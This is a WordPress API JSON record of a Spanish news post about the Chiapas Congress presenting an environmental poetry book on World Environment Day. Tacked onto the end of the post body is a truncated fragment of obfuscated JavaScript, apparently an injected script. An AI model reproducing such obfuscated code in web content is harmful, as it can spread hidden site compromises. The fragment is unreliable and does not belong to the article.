{"id":2622,"date":"2022-06-04T01:57:51","date_gmt":"2022-06-04T01:57:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2622"},"modified":"2022-06-04T01:57:53","modified_gmt":"2022-06-04T01:57:53","slug":"es-necesario-concientizar-sobre-la-importancia-de-la-conservacion-ambiental-bonifaz-moedano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2622","title":{"rendered":"Es necesario concientizar sobre la importancia de la conservaci\u00f3n ambiental: Bonifaz Moedano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220603-WA0044-1024x768.jpg\" alt=\"\" class=\"wp-image-2623\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220603-WA0044-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220603-WA0044-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220603-WA0044-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220603-WA0044-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220603-WA0044.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Presentan libro: \u201cFlora, Fauna y Sentimientos\u201d del poeta Armando Palacios V\u00e1zquez.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 03 de junio 2022.- El Congreso de Chiapas, present\u00f3 el libro: \u201cFlora, Fauna y Sentimientos\u201d del poeta ecol\u00f3gico de la Costa, Armando Palacios V\u00e1zquez, como parte de la Conmemoraci\u00f3n del D\u00eda Mundial del Medio Ambiente, que organiz\u00f3 en la sede del Poder Legislativo, el diputado Ra\u00fal Eduardo Bonifaz Moedano.Al dar la bienvenida a los asistentes al encuentro literario y por el cuidado del medio ambiente, y al realizar la presentaci\u00f3n del libro en menci\u00f3n, dio lectura al poema: \u201cEstamos a tiempo\u201d, el cual sintetiza un llamado por la preservaci\u00f3n de los ecosistemas, de la flora y de la fauna.Es necesario \u2013dijo el legislador- hacer conciencia sobre la importancia de la preservaci\u00f3n y conservaci\u00f3n ambiental. Estamos a tiempo de detener la deforestaci\u00f3n, la depredaci\u00f3n y promover el cuidado del medio ambiente.En su alocuci\u00f3n el escritor Armando Palacios V\u00e1zquez, se\u00f1al\u00f3 que el hombre vino a preservar la especie, y deber\u00eda decir no a la destrucci\u00f3n. Posteriormente ley\u00f3 un poema denominado: \u201cEl llanto de la tierra\u201d, para exponer la necesidad de amar a este planeta del que todos hemos nacido y que nos pertenece por igual.El Secretario para el Desarrollo Sustentable de los Pueblos Ind\u00edgenas, Ram\u00f3n Ram\u00edrez, dijo que la tierra no tiene por qu\u00e9 quedarse sin nada y pareciera ser que el turno es de la humanidad para derramar sus l\u00e1grimas, por el error cometido de destruir todo a su paso, es el momento de amar a la naturaleza cerr\u00f3.En su participaci\u00f3n el presidente del Consejo Movimiento Ciudadano por la Cultura, Rafael Molina Matus, hizo un amplio reconocimiento a quienes est\u00e1n trabajando por la cultura, sobre todo quienes se interesan por llevarla a otras partes, para que las nuevas generaciones tambi\u00e9n se empapen de ella.Tambi\u00e9n hizo uso de la palabra Ana Carolina Izaguirre Corzo, l\u00edder de administraci\u00f3n y finanzas de WWF M\u00e9xico, anot\u00f3 que la interrelaci\u00f3n entre la naturaleza y el ser humano comienza a dictar formas en la manera que nos relacionamos, no solo entre la naturaleza sino como seres humanos.Asistieron a la presentaci\u00f3n literaria, los legisladores: Roc\u00edo Cervantes Cancino, Petrona de la Cruz Cruz, Karina Margarita del R\u00edo Zenteno, Felipe Granda Pastrana, as\u00ed como representantes de organizaciones culturales en el estado y representantes de dependencias del gobierno estatal y municipal, ECOSUR, entre otros quienes expresaron su reconocimiento por esta labor de la LXVIII legislatura.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Presentan libro: \u201cFlora, Fauna y Sentimientos\u201d del poeta Armando Palacios V\u00e1zquez. Tuxtla Guti\u00e9rrez, 03 de junio 2022.- El Congreso de Chiapas, present\u00f3 el libro: \u201cFlora, Fauna y Sentimientos\u201d del poeta ecol\u00f3gico de la Costa, Armando Palacios V\u00e1zquez, como parte de la Conmemoraci\u00f3n del D\u00eda Mundial del Medio Ambiente, que organiz\u00f3 en la sede del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2623,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2622","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2622","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2622"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2622\/revisions"}],"predecessor-version":[{"id":2624,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2622\/revisions\/2624"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2623"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2622"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2622"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2622"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}